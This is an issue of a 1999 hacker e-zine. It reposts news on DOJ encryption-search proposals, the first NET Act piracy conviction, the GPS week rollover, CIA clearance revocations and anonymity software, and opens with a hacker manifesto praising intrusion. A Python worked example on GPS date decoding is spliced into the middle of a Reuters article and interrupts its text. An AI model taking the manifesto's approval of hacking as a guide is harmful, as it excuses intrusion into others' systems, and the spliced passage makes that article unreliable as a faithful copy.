This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals.

Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.

I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike.
+++The Mentor+++
Racketeers

==============================================================================

02.0 From the editor.
~~~~~~~~~~~~~~~~

#include <stdio.h>

int main(void)
{
    printf ("Read commented source!\n\n");

    /* This issue includes an article by Dragos Ruiu that is well worth the read
     * it is entitled "Stealth Coordinated Attack HOWTO" as mentioned in the header
     * and outlines various attack methods employed by todays hacker used to scope
     * out and penetrate your systems. The article can be found in section 42.0
     *
     * As always we welcome your stories, articles and poetry, please send them with any
     * information about yourself you see fit or would like included to the address below...
     *
     * Please, send your submissions to: hwa@press.usmc.net thank you.
     *
     * Cruciphux
     */

    printf ("EoF.\n");
    return 0;
}

Congrats, thanks, articles, news submissions and kudos to us at the main address:

hwa@press.usmc.net

complaints and all nastygrams and mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org

danke.

C*:.

03.0 DOJ contemplates secret searches
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

SECRET SEARCHES FROM DOJ
by BHZ, Tuesday 24th August 1999 on 2:34 pm CET

InfoWar published a briefing on public policy issues written by Center for Democracy and Technology (www.cdt.org). "The Justice Department is planning to ask Congress for new authority allowing federal agents armed with search warrants to secretly break into homes and offices to obtain decryption keys or passwords or to implant 'recovery devices' or otherwise modify computers to ensure that any encrypted messages or files can be read by the government". Read the briefing here.
8/23/99 DOJ Proposes Secret Searches

C D T P O L I C Y P O S T

A BRIEFING ON PUBLIC POLICY ISSUES AFFECTING CIVIL LIBERTIES ONLINE
from THE CENTER FOR DEMOCRACY AND TECHNOLOGY

Volume 5, Number 19 August 20, 1999

CONTENTS:
(1) Justice Department Proposes Secret Searches of Homes, Offices
(2) If the Government Wants Your Data, It Should Come to You For It
(3) Proposal Also Sets Standards for Access to Escrowed Keys
(4) Subscription Information
(5) About the Center for Democracy and Technology

** This document may be redistributed freely with this banner intact **
Excerpts may be re-posted with permission of ari@cdt.org

This document is also available at: http://www.cdt.org/publications/pp_5.19.html

(1) JUSTICE DEPARTMENT PROPOSES SECRET SEARCHES OF HOMES, OFFICES

The Justice Department is planning to ask Congress for new authority allowing federal agents armed with search warrants to secretly break into homes and offices to obtain decryption keys or passwords or to implant "recovery devices" or otherwise modify computers to ensure that any encrypted messages or files can be read by the government.

With this dramatic proposal, the Clinton Administration is basically saying: "If you don't give your key in advance to a third party, we will secretly enter your house to take it if we suspect criminal conduct."

The full text of the Justice Department proposal, a section-by-section analysis prepared by DOJ lawyers, and related materials are available at: http://www.cdt.org/crypto/CESA.

The proposal has been circulating within the Clinton Administration since late June. On August 5, the Office of Management and Budget circulated it for final interagency review. In the normal course, after all potentially interested agencies have been consulted, the proposal would be transmitted to Capitol Hill, where it could be introduced by any Member, or offered as an amendment to pending legislation.
(2) IF THE GOVERNMENT WANTS YOUR DATA, IT SHOULD COME TO YOU FOR IT

The proposal is intended to eliminate a core element of our civil liberties. Normally, under the Fourth Amendment in the Bill of Rights, when the government wants to search your home or office, the government must obtain a court order issued by a judge based on a finding of probable cause to believe that a crime is being committed AND the government must provide you with contemporaneous notice of the search -- show you the warrant and leave an inventory of the items seized.

This notice requirement has ancient roots. It is based on the notion that the judicial warrant (issued on the basis of the government agent's untested assertions presented to a judge in private) does not provide adequate protection against abuse. Notice is important because it gives you the opportunity to observe the conduct of the government agents and protect your rights. If the agents are exceeding the scope of the warrant, for example, you can even rush down to the courthouse and ask a judge to stop the search. And after the search, you can exercise your rights for return of your property and otherwise defend yourself.

Over time, our society has tolerated exceptions to this rule. For example, the government can enter secretly to plant bugs to pick up oral communications or to bug your phone, but that is quite rare. Most wiretaps do not involve entry into the home. A few courts in a few cases have allowed so-called "sneak and peek" searches, in which government agents can enter surreptitiously, provided they don't take anything. And in the name of foreign counterintelligence, the government has long conducted "black bag jobs," such as the one in which they searched the home and computer of CIA employee Aldrich Ames.

The new DOJ proposal is a huge expansion of these previously narrowly defined exceptions.
The proposal takes extraordinary cases at the fringes of the law and makes them routine, given the increasingly ubiquitous nature of computers. Thus, the encryption debate, which up until now has been about privacy and security in cyberspace, is becoming a struggle over the sanctity of the home.

(3) PROPOSAL ALSO SETS STANDARDS FOR ACCESS TO ESCROWED KEYS

The proposal also includes detailed procedures for government access to keys and other forms of decryption assistance stored with third parties. Again, the essence of the DOJ proposal is government access to keys without the knowledge or cooperation of the crypto user.

The DOJ claims that these key recovery provisions provide greater protection for lawful users of encryption, by making it clear that a third party holding a decryption key or other recovery information cannot disclose it or use it except in accordance with the procedures set forth in the Act. The DOJ-drafted procedures are complicated and unique, turning on unanswered questions of what is "generally applicable law" and what is a "constitutionally protected expectation of privacy." They fall far short of protections proposed by Sen. Patrick J. Leahy (D-VT) in the Electronic Rights for the Twenty-First Century (E-RIGHTS) bill, S. 854, described at http://www.cdt.org/crypto/legis_106/ERIGHTS/

In any case, few individuals use third party key recovery, and there seems to be little individual or corporate interest in key recovery for communications, so even the strictest procedures for access to escrowed keys would be vastly outweighed by the proposed secret searches of homes and offices.

In the small comfort department, the DOJ proposal makes it clear that key escrow or third party key recovery would not be mandatory.

(4) SUBSCRIPTION INFORMATION

Be sure you are up to date on the latest public policy issues affecting civil liberties online and how they will affect you! Subscribe to the CDT Policy Post news distribution list.
CDT Policy Posts, the regular news publication of the Center for Democracy and Technology, are received by Internet users, industry leaders, policymakers, the news media and activists, and have become the leading source for information about critical free speech and privacy issues affecting the Internet and other interactive communications media.

To subscribe to CDT's Policy Post list, send mail to

majordomo@cdt.org

In the BODY of the message (leave the SUBJECT LINE BLANK), type

subscribe policy-posts

If you ever wish to remove yourself from the list, send mail to the above address with NOTHING IN THE SUBJECT LINE and a BODY TEXT of:

unsubscribe policy-posts

(5) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest organization based in Washington, DC. The Center's mission is to develop and advocate public policies that advance democratic values and constitutional civil liberties in new computer and communications technologies.

Contacting us:
General information: info@cdt.org
World Wide Web: http://www.cdt.org/
Snail Mail: The Center for Democracy and Technology
1634 Eye Street NW * Suite 1100 * Washington, DC 20006
(v) +1.202.637.9800 * (f) +1.202.637.0968

End Policy Post 5.19

Aleksandr Gembinski
Webmaster etc.
Center for Democracy and Technology
1634 Eye Street, NW 11th Floor
Washington, DC 20006
(v) +1.202.637.9800 (f) +1.202.637.0968
http://www.cdt.org/

@HWA

04.0 FIRST NET CONVICT WILL DO NO TIME
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by Thejian, Monday 23rd August 1999 on 9:30 pm CET

The University of Oregon student who last Friday pled guilty to felony cyber-crime charges and in so doing became the first-ever person convicted under the No Electronic Theft (NET) Act, will not do any jail time. The student will be sentenced Nov. 2 - and although he faces a maximum of three years in jail for his conviction on one count of "criminal infringement or reproduction" of commercial software - his plea arrangement assures that he will not see the inside of a jail cell, although he still is saddled with a felony conviction according to the deputy chief of DOJ's computer crime division. Story on Newsbytes

First NET Convict Will Do No Time - Update

By David McGuire, Newsbytes
WASHINGTON, DC, U.S.A., 23 Aug 1999, 12:31 PM CST

A University of Oregon student convicted of distributing pirated software over the Internet will not spend any time in jail under a plea agreement with Department of Justice attorneys.

The student last Friday pled guilty to felony cyber-crime charges and in so doing became the first-ever person convicted under the decade-old No Electronic Theft (NET) Act, Newsbytes reported last week.

The student was accused of pilfering thousands of business and entertainment programs and posting them, free-of-charge, on his Website, said David Greene, deputy chief of Justice's computer crime division.

Before the NET Act was passed, prosecutors had to prove that cyber-thieves received "commercial benefits" from their thefts in order to win convictions. But the NET Act closed that loophole.

The student will be sentenced Nov. 2 - and although he faces a maximum of three years in jail for his conviction on one count of "criminal infringement or reproduction" of commercial software - his plea arrangement assures that he will not see the inside of a jail cell, Greene said.

Still, he is saddled with a felony conviction, and Greene hopes coverage of the case will deter other software pirates, he said.

Earlier this year, some congressional Republicans questioned why there had been no Department of Justice prosecutions under the NET Act. DoJ called yesterday's conviction a clear message that Justice is enforcing the law.

"We are not going to bring hundreds of these cases," Greene said.
But DoJ is "trying to discourage (computer piracy) as a hobby." While such thefts may seem comparatively innocuous, they have "done some real damage to software companies," Greene said.

Reported by Newsbytes.com, http://www.newsbytes.com .

12:31 CST Reposted 12:31 CST

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2318386,00.html?chkpt=hpqs014

--------------------------------------------------------------
This story was printed from ZDNN, located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Feds convict first Internet pirate
By Reuters
August 20, 1999 5:22 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2318386,00.html?chkpt=hpqs014

WASHINGTON -- An Oregon college student who gave away music, movies and software on the Web has become the first person convicted of a felony under a law punishing Internet copyright piracy, the government said Friday.

Jeffrey Gerard Levy, 22, a senior at the University of Oregon in Eugene, pleaded guilty to violating the No Electronic Theft Act of 1997, the U.S. Justice Department announced.

The Justice Department said Levy admitted that in January of this year he "illegally posted computer software programs, musical recordings, entertainment software programs and digitally recorded movies on his Internet Web site, allowing the general public to download and copy these copyrighted products."

A Justice Department official said there was no evidence that Levy had made any profit from the freely available works.

Anybody who distributes 10 or more copyrighted works with a value of more than $2,500 can face up to three years in prison and a fine of up to $250,000. Levy faces sentencing Nov. 2.

@HWA

05.0 NORTON ANTIVIRUS 2000 IS OUT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by BHZ, Tuesday 24th August 1999 on 3:17 pm CET

Symantec (www.symantec.com) published Norton Utilities 2000, Norton AntiVirus 2000, and Norton CleanSweep 2000.
Norton AntiVirus 2000 has two new features: support for automatic scanning of incoming e-mail attachments from POP-based e-mail applications, and it can automatically eliminate viruses in multiple compressed file levels, such as a Zip file inside another Zip file.

@HWA

06.0 SSL CPU CONSUMPTION CAUSES CONCERNS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by Thejian, Tuesday 24th August 1999 on 11:50 am CET

A recently released study by research and consulting firm Networkshop, found that various combinations of servers, processors, operating systems and online content used in conjunction with Secure Sockets Layer (SSL) can hamper the performance of Web servers. SSL helps secure e-commerce transactions, but these new findings suggest that its CPU consumption may end up impeding those same transactions. Full story

SSL's CPU appetite causes concern

Amy Rogers

Washington, D.C. - Secure Sockets Layer (SSL) technology helps secure E-business transactions, but its voracious consumption of CPU space may end up impeding those same transactions.

In a study released this summer, research and consulting firm Networkshop, Ottawa, found that various combinations of servers, processors, operating systems and online content used in conjunction with SSL can hamper the performance of Web servers.

Networkshop paired Linux, Windows NT and Sun Microsystems Inc. Solaris with Web servers including Apache, Stronghold and Microsoft Corp.'s Internet Information Server. Windows NT plus Intel Corp. processors tended to better handle the task of processing SSL's complex algorithms, he said.

Slow performance could lead to frustrated or lost customers, so VARs implementing E-business solutions might want to examine several types of products that offload encryption processing from the server itself to another device.
These products include PC cards or server cards, such as Rainbow Technologies Inc.'s CryptoSwift; encryption-offloading units that sit on the network, such as those from nCipher Corp.; and so-called Internet Commerce Appliances, such as IPivot Inc.'s Commerce Director 8000.

Such devices, including IPivot's Commerce Accelerator 1000, an entry-level version of Commerce Director, free up Web servers to perform tasks other than crunching numbers.

CryptoSwift offloads 200 SSL transactions per second, said Bob Bova, director of business development at Rainbow Technologies, Irvine, Calif. Rainbow is seeking resellers that add "significant value to security technology" to add to its stable of partners. Already 15 VARs and integrators are on board, he said.

Copyright © 1999 CMP Media Inc.

07.0 Bug in Bill Gates' Anus?
~~~~~~~~~~~~~~~~~~~~~~~~

Aug 27th

SmoG sent this in...

http://support.microsoft.com/isapi/support/pass.idc?Product=Bill%20Gates%20Anus

In case it has been replaced by the time you read this the following headlined a bug report form on Microsoft's tech support page

"Do you think you've found a bug in Microsoft Bill Gates Anus?"

With the submission form following the header...

@HWA

08.0 CESA Causing Outrage In Libertarians
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by AlienPlague

The 'Cyberspace Electronic Security Act', which HNN has previously reported on, is drawing much criticism and causing outrage amongst civil libertarians and high-tech industry trade groups. They say that the act not only violates Civil Rights, but "would make police break-ins far more common than they are now." While law enforcement agencies claim that encryption is detrimental to their job of tracking criminals and crime, most seem to feel that it is just another way the current administration will attempt to impose 'big brother' monitoring powers over American citizens.
MSNBC
http://www.msnbc.com/news/302945.asp

Furor rising over PC wiretap plan

Civil libertarians, trade groups outraged by DOJ proposal that would ‘booby-trap’ PCs. But will Congress go ‘ballistic’?

By Maria Seminerio
ZDNN

Aug. 20 — A U.S. Department of Justice proposal to make it easier for police to break into homes and access computers is drawing a furious reaction from civil libertarians and high-tech industry trade groups.

THE DRAFT LEGISLATION, for which the DOJ hopes to find a sponsor in Congress, is dubbed the Cyberspace Electronic Security Act. The law would make it easier for law enforcement officials to obtain from judges a now-rarely-used authorization to break into a suspect’s home and plant a hidden listening device. But in this case, the computer equivalent of the “listening device” is the authorization for investigators to disable data-scrambling encryption programs on PCs. (In order to actually copy data from the computer, police would still need a separate warrant from a judge.)

DOJ wants clearance to bug PCs

”(The proposal) strikes at the heart of the Bill of Rights,” said David Sobel, general counsel for the Electronic Privacy Information Center.

Noting that judges in all federal and state courts combined only issued 50 warrants for so-called “surreptitious physical entries” last year, Sobel said extending such authorization to cases involving computer files “would make police break-ins far more common than they are now.”

‘BOOBY-TRAP YOUR COMPUTER’

The proposal would “basically allow investigators to booby-trap your computer ahead of time” by disabling encryption, he said.

The proposal was most likely spurred by the frustration investigators have experienced when finding encrypted data on computers used by suspected drug dealers and other criminals, he added.

DOJ officials did not respond to requests for interviews Friday.
But in a letter to House Speaker Dennis Hastert, Acting Assistant Attorney General Jon Jennings said the new law would aid investigators when information needs to be deciphered “in a timely manner.”

“While under existing law, law enforcement is provided with different means to collect evidence of illegal activity, these means are rendered wholly insufficient when encryption is used,” wrote Jennings in the letter.

“In the context of law enforcement operations, stopping a terrorist attack or seeking to recover a kidnapped child, time is of the essence and may mean the difference between success and catastrophic failure.

“While existing means of obtaining evidence would remain applicable in a fully-encrypted world, the failure to provide law enforcement with the necessary ability to obtain the plain-text version of the evidence makes existing authorities useless,” he wrote.

EPIC: CONGRESS WILL GO ‘BALLISTIC’

Noting that the proposal would need to find a sponsor in Congress and then be passed into law before it could take effect, EPIC’s Sobel said it could encounter resistance by lawmakers.

“I think people in Congress are going to go ballistic over this, particularly since it’s coming right on the heels of the FIDNET” controversy, he said.

FIDNET — the controversial proposal to monitor government and some private networks for hacking activity — came to light earlier this summer and remains in limbo.

Barry Steinhardt, president of the American Civil Liberties Union, said that the Federal Bureau of Investigation has often misused its powers in the past, and could do so again under the DOJ proposal.

“There’s every reason to believe they’re not just going to look at the Mob using the powers sought under the proposal,” Steinhardt said. “They’ll use this power to interfere with protected speech.”

Also condemning the plan were the Computer and Communications Industry Association, the Center for Democracy and Technology, and Americans for Computer Privacy.
CLINTON ADMIN: BIG BROTHER?

The plan is “an unprecedented attempt by the Clinton administration to impose ‘big brother’ monitoring powers over American citizens,” ACP officials said in a statement. “The fact is that current laws provide law enforcement broad powers to obtain information.”

“This is another attempt by law enforcement to do an end-run (around encryption),” said Ed Black, president of the CCIA. “It offers a real temptation for investigators to overreach and overextend” the current limits on searches and seizures, he said.

“Anybody’s vulnerable,” Black added. ”(This) resembles something the KGB would propose.”

@HWA

09.0 ReDaTtAcK Arrested, Questioned, Charged, Released
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Wizzy24

After electronically breaking into the General Bank of Belgium, ReDaTtAcK has been apprehended. He was traced via his cell phone and then arrested and later released. He has not been charged with computer intrusion as Belgium has no such law. Instead he will be charged with electronic eavesdropping charges after breaking into SkyNet a Belgian ISP run by the state owned telephone company Belgacom. ReDaTtAcK has stated that he will continue to do what he does.

The Standard - Dutch
http://www.standaard.be

@HWA

10.0 Some GPS Systems Fail With Date Rollover
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid

While the GPS satellites themselves and most GPS receivers continued to function normally some units failed when the GPS date rolled over this past weekend. Many Japanese users of in car navigation systems experienced complete systems failure when the date rolled over. Four Japanese manufacturers of GPS systems have completed updating a little over half of the GPS systems sold in the country since 1996.
Yahoo News
http://dailynews.yahoo.com/h/nm/19990822/tc/gps_japan_1.html

Sunday August 22 1:10 AM ET

Irate Japanese Car Drivers Hit By GPS Bug

TOKYO (Reuters) - A steady stream of irate customers called Japanese car navigation makers Sunday after their automotive directional devices failed due to a computer flaw.

The screens on some car navigation systems went blank while others froze up as a computer bug struck Global Positioning System (GPS) devices, electronics company Pioneer Electronic Corp said.

Pioneer, one of several car navigation system makers battling the bug, had received several hundred phone calls since the problem started at 9 a.m., a spokeswoman said.

About 450 Pioneer workers manned telephone lines and staffed service centers over the weekend to help customers with the GPS problem, she said.

Some 95,000 car navigation units sold in Japan may be unable to cope with an internal date change in the system, the Ministry of International Trade and Industry said.

Four Japanese manufacturers of GPS systems have completed updating only about 170,000 of the estimated 260,000 units sold in Japan since 1996 and believed to be still in operation.

Japanese drivers are heavily reliant on the navigational devices because most streets in urban centers such as Tokyo are unnamed and follow curving paths laid out among a tangle of property lines.

Japan's Maritime Safety Agency has received reports that ships with older GPS systems are in or near territorial waters but has not received any distress calls as of Sunday noon, a spokesman said.

At midnight GMT, the 24 satellites of the Global Positioning System, which provide navigational data from 17,700 kilometers (11,000 miles) out in space, switched their timing system back to zero.

The rollover is because the system, which uses radio signals from satellites to provide navigation data, was designed to ignore calendar dates but keep precise time measured in seconds and weeks.
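The week counter the Reuters story is talking about is a 10-bit field, so it holds 0..1023 and wraps to 0 after 1,024 weeks. The following is an added worked example (not part of the Reuters report and not any manufacturer's firmware) showing what the satellites broadcast, what a receiver that assumes the counter never wraps computes on 22 August 1999, and the usual fix: resolving the 10-bit value against a date the receiver knows is in the past. The reference date of 1 January 1996 used here stands in for a firmware build date and is an assumption; all sample dates are constructed for the example.

```python
from datetime import date, timedelta

GPS_EPOCH = date(1980, 1, 6)   # GPS week 0, day 0 (a Sunday)
WEEK_BITS = 10                 # width of the broadcast week-number field
WINDOW = 1 << WEEK_BITS        # 1024 weeks, about 19.6 years, then it wraps to 0


def _as_date(d):
    """Accept either a date or an ISO string such as '1999-08-22'."""
    return d if isinstance(d, date) else date.fromisoformat(d)


def full_gps_week(d):
    """Weeks elapsed since the GPS epoch with no truncation (ground truth)."""
    return (_as_date(d) - GPS_EPOCH).days // 7


def gps_day_of_week(d):
    """Day within the GPS week: 0 = Sunday."""
    return (_as_date(d) - GPS_EPOCH).days % 7


def broadcast_week(d):
    """What actually goes over the air: the week number modulo 1024."""
    return full_gps_week(d) % WINDOW


def naive_decode(week10, day_of_week):
    """A receiver that assumes the counter never wraps (the failure mode).

    On 22 Aug 1999 the field read 0 again, so such a unit believed the
    date was 6 Jan 1980 and anything keyed to the calendar fell over.
    """
    return GPS_EPOCH + timedelta(weeks=week10, days=day_of_week)


def decode_with_reference(week10, day_of_week, reference):
    """Resolve the 10-bit week against a date known to be in the past.

    `reference` is assumed to be something like the firmware build date:
    the true week cannot be earlier than it, so pick the smallest full week
    number >= the reference week whose low 10 bits equal the broadcast value.
    This is correct for ~19.6 years after the reference; beyond that the
    unit needs a newer reference, i.e. the firmware update the story's
    manufacturers were shipping.
    """
    ref_week = full_gps_week(reference)
    candidate = ref_week - (ref_week % WINDOW) + week10   # same 1024-week window as the reference
    if candidate < ref_week:                             # counter already wrapped past the reference
        candidate += WINDOW
    return GPS_EPOCH + timedelta(weeks=candidate, days=day_of_week)


if __name__ == "__main__":
    # Constructed samples: the day before the rollover, the rollover day, and a later date.
    for d in ("1999-08-21", "1999-08-22", "2000-01-01"):
        w10, dow = broadcast_week(d), gps_day_of_week(d)
        print(d, "broadcast week", w10, "day", dow,
              "| naive ->", naive_decode(w10, dow),
              "| anchored ->", decode_with_reference(w10, dow, "1996-01-01"))
```

The 21 August 1999 sample decodes the same way under both strategies (week 1023 has not wrapped yet); the 22 August sample is where they diverge, which is exactly the morning the Pioneer phone lines lit up. A reference-date window is only as good as the reference: a unit built in 1996 is safe until 2015 with this scheme, not forever.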
Only 1,024 weeks were allotted from January 6, 1980, before the system is reset to zero.

@HWA

11.0 Security Search Engine MindSec Goes Online
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Erik

www.mindsec.com goes live today, providing a search engine to search 90 different sites that are security and administration related. MindSec will also have product reviews on admin and security applications and hardware.

MindSec
http://www.mindsec.com

@HWA

12.0 CIA Ex-Director Security Clearance Revoked
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Erik

John Deutch, former director of the CIA, has had his security clearance revoked after it was found that he kept classified material on his home PC.

Yahoo News
http://dailynews.yahoo.com/h/nm/19990822/tc/cia_3.html

Sunday August 22 12:02 AM ET

CIA Suspends Ex-Director Deutch Security Clearance

WASHINGTON (Reuters) - The CIA has suspended security clearance for its former director, John Deutch, who was found to have kept classified material on a computer at his home.

A CIA statement Friday said clearance for Deutch, the Central Intelligence Agency director for 20 months up to December 1996, had been suspended ``for an indefinite period of time.''

The decision followed a review of the case by the current director, George Tenet, and a decision by the Justice Department in April not to prosecute Deutch.

The statement said that although a report by the CIA's Inspector General ``found no evidence that national security information was lost, the potential for damage to U.S. security existed.''

Newsweek reported in April that 31 classified documents were discovered on a computer at his home in a routine check after Deutch, a pillar of the Washington establishment for decades, left the agency.
Deutch issued a statement through the CIA Friday saying: ''...I erred in using CIA-issued computers that were not configured for classified work to compose classified documents and memoranda.''

He said: ``Although I accept responsibility for my mistake, I want to make clear that I never considered the information to be at risk or intended to violate security precautions. But good intentions simply are not enough. Strict compliance is the standard.''

Earlier this year Deutch was appointed to head a commission reviewing security at science laboratories after reports of Chinese spying at nuclear facilities but he withdrew as reports of his own misuse of classified materials emerged.

@HWA

13.0 GAO Releases Report on Risk Assessment
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

In an attempt to give federal agencies some sort of guideline on how to secure their systems the Government Accounting Office has released the Information Security Risk Assessment: Practices of Leading Organizations report. The report details security programs used by four unnamed organizations, which included oil, financial and computer companies and one federal regulatory agency. The report goes on to identify seven critical factors of a successful ongoing security risk-assessment program.

Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0823/fcw-newsgao-08-23-99.html

General Accounting Office
http://www.gao.gov

FCW; AUGUST 23, 1999

GAO report tries to sort out risk-assessment confusion

BY DIANE FRANK (diane_frank@fcw.com)

Facing growing security threats to increasingly complex government computer systems, the General Accounting Office last week released a report to help federal agencies determine how vulnerable their systems are and how to make them more secure.
Although GAO's report, "Information Security Risk Assessment: Practices of Leading Organizations," does not present specific suggestions for agencies to determine how to secure systems from cyberattacks, it identifies seven critical factors of a successful ongoing security risk-assessment program, including defining and documenting procedures and results.

The report details programs put in place by four unnamed organizations, which included oil, financial and computer companies and one federal regulatory agency. GAO did not name the organizations because it feared that hackers might target them.

The report also includes diagrams detailing the risk-assessment process for each organization and a description of how they made their decisions. For example, the regulatory agency conducts risk assessments "to determine the applicable security controls," the GAO reported. "This is done by determining which of a pre-defined set of controls is appropriate for individual business operations and comparing what is appropriate to controls already in place to identify and address gaps."

The best practices outlined in the report will be helpful, especially at smaller civilian agencies that do not have the resources that department-level agencies have, said John Gilligan, chief information officer at the Energy Department and co-chairman of security on the CIO Council's Critical Infrastructure, Privacy and Security Committee. "I think it will be useful for people who are charged with risk management to have examples of what others are doing," he said.

This is especially true because security and risk assessment are not one-size-fits-all concepts, said Mike Lortz, vulnerability assessment product manager at Internet Security Systems Inc. "The process needs to be different from agency to agency...but the agencies need to be able to use something as a guideline," he said.

GAO intends the report to be a supplement to last year's executive guide on information security management.
Risk assessment is only one of the five areas outlined in last year's guide, but GAO decided to focus its latest guide on that area because it is what most people in government seem to be worried about, GAO said.

"When we did the original guide, during the exposure draft period we got some comments that [said] we should dig deeper into some of these areas, and more comments mentioned risk assessment than any others," said Jean Boltz, assistant director of governmentwide and defense information systems within GAO's Accounting and Information Management Division.

Agencies have been confused about how to conduct risk assessment and apply that to the security needs they have, Boltz said, especially after the Office of Management and Budget revised its computer security regulations in 1996 and eliminated the requirement to perform risk assessments. Agencies have been confused about what to do because, although OMB no longer requires risk assessments, it still requires agencies to measure their systems' vulnerability to cyberattacks and unauthorized access and then base their security architecture on that knowledge, Boltz said.

Agencies' confusion about risk assessment has heightened because of the increasing use of the Internet and because computer systems are becoming more interdependent, Gilligan said.

"Risk assessment is a big deal because it has not been institutionalized," Gilligan said. "In the past, there had been great emphasis on doing risk assessment, but [it] tended over time to not be used or not be done well."

@HWA

14.0 CESA Drives People to Freedom
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Jordan

The Cyberspace Electronic Security Act, a recent proposal, which if it became law, would allow law enforcement agents to break into your personal PC, is forcing people to seek out ways to protect themselves. One of the methods people have been looking at is Freedom from Zero Knowledge Systems.
While the software is still in Beta it promises complete anonymity on the internet. Freedom Beta 3 is nearing completion and is slated for release during the first week in September. The new beta will have increased functionality, stability and ease of use.

Freedom
http://www.zks.net/clickthrough/click.asp?partner_id=542

Zero Knowledge CESA Info Page
http://www.zeroknowledge.com/cesa/

CNN
http://www.cnn.com/TECH/computing/9908/18/freedom/

Total digital privacy may be on the horizon

August 18, 1999
Web posted at: 5:32 p.m. EDT (2132 GMT)

By Robin Lloyd
CNN Interactive Senior Writer

(CNN) -- If American software developers were to touch any of the code in the 10,000 released beta versions of an Internet privacy solution that is getting good preliminary marks, they would be subject to prosecution. In fact, if Zero-Knowledge Systems were based in the United States, it would be illegal for the company to export its Internet privacy software, dubbed 'Freedom.'

Instead, the Montreal-based start-up, headed up by 26-year-old Austin Hill, is set to release the first product of its kind -- a comprehensive Internet privacy package that offers multiple online pseudonyms and Byzantine encrypted rerouting that even Zero-Knowledge couldn't crack if it wanted to. No more cookies, e-mail trails and digital identity stealing. At least, that's the idea.

More than a dozen "cookie killers" already exist, along with several e-mail and browser anonymity services such as anonymizer.com. Those all rely on what Hill calls a "trust-me" mechanism. A third party server holds users' identity and data. Freedom makes it so the end-user has sole possession of that data.

"If there was a gun to my head, I still could not reveal or break the privacy of my users," Hill says.
The user has the only "key" to their pseudonyms, which can be linked to independent e-mail addresses, geographic locations and encryption keys. Freedom is designed to protect the e-mail, chats, browsing and newsgroup searches of anyone from a Chinese dissident posting pro-democracy messages to an employee checking out listings for Alcoholics Anonymous.

The software can encrypt private chats and newsgroup discussions, ensures anonymous Web browsing and can even block spam, Hill says. Each digital identity relies on full strength encryption that ranges from 128 to 4,096 bits.

Freedom 1.0, which works only on Windows platforms, is set for release in late October or early November. It will be downloadable for $49.95. Macintosh and Linux versions are due out next year. Freedom doesn't work with America Online, however, since AOL is an online service separate from the Internet.

Zero-Knowledge released 1,000 beta copies of Freedom at the DefCon 7 convention in Las Vegas last month. Since then, it has released thousands more via its Web site. A total of 50,000 people have requested copies since then.

How it works

Web users leave traces of their identity behind every time they visit a Web site or send e-mail. To get a sense of the process, visit the Center for Democracy and Technology's site and use its demo.

Freedom allows users to set up separate pseudonyms for different aspects of their lives -- an identity for an online chat about health care, another for interactions with friends and family, others for Internet browsing and finally a 'true' identity for e-commerce. Zero-Knowledge is working on an e-commerce identity protection solution for future versions.

Freedom scrambles data coming from a user's PC and hides the source and destination of Internet traffic routed through the service. The message or data packet is first sent to Zero-Knowledge's servers where it is wrapped in a layer of encryption.
That initiates a delivery process where the data bounces from one independently owned relay station to the next and can only be opened by one specific user who then forwards it to another specific user, with that process repeating several times. Eventually a data packet goes to its intended target but neither snoopers, nor the final recipient, have any way of tracing its origins.

Third-party protections, the approach relied upon by Freedom's predecessors, can be hacked or bought away when the company makes a new acquisition, as was the case when Double Click acquired Abacus, Hill said. Or, civil lawsuits can force ISPs to turn over their records.

Freedom gets high marks

David Sobel, general counsel for the Electronic Privacy Information Center, and Ari Schwartz, a policy analyst with the Center for Democracy and Technology, agree that Freedom is a good solution.

"I suspect that it is one of the best solutions that we've seen," Sobel said. Freedom's strength comes from Hill's philosophical commitment to preserving privacy and anonymity on the Internet, Sobel said.

Schwartz underlined the Center's stance on Internet privacy -- software solutions combined with self-regulation among service providers and legislation will be needed to protect privacy online. The U.S. Congress has introduced several bills this session relating to online privacy but advocates say they may not go far enough. A CDT report concludes that online privacy is the exception, not the rule, in the private sector.

U.S. encryption policy has its pros and cons

The U.S. policy that prohibits encryption exports and labor is based on protecting security codes produced and cracked by the FBI and other national security agencies. The downside is that we may lose out on what has turned into a $1.5 billion cryptography business for Canada, where limits are less strict, Hill says.

The U.S. approach could backfire and result in a brain drain of encryption experts, EPIC's Sobel said.
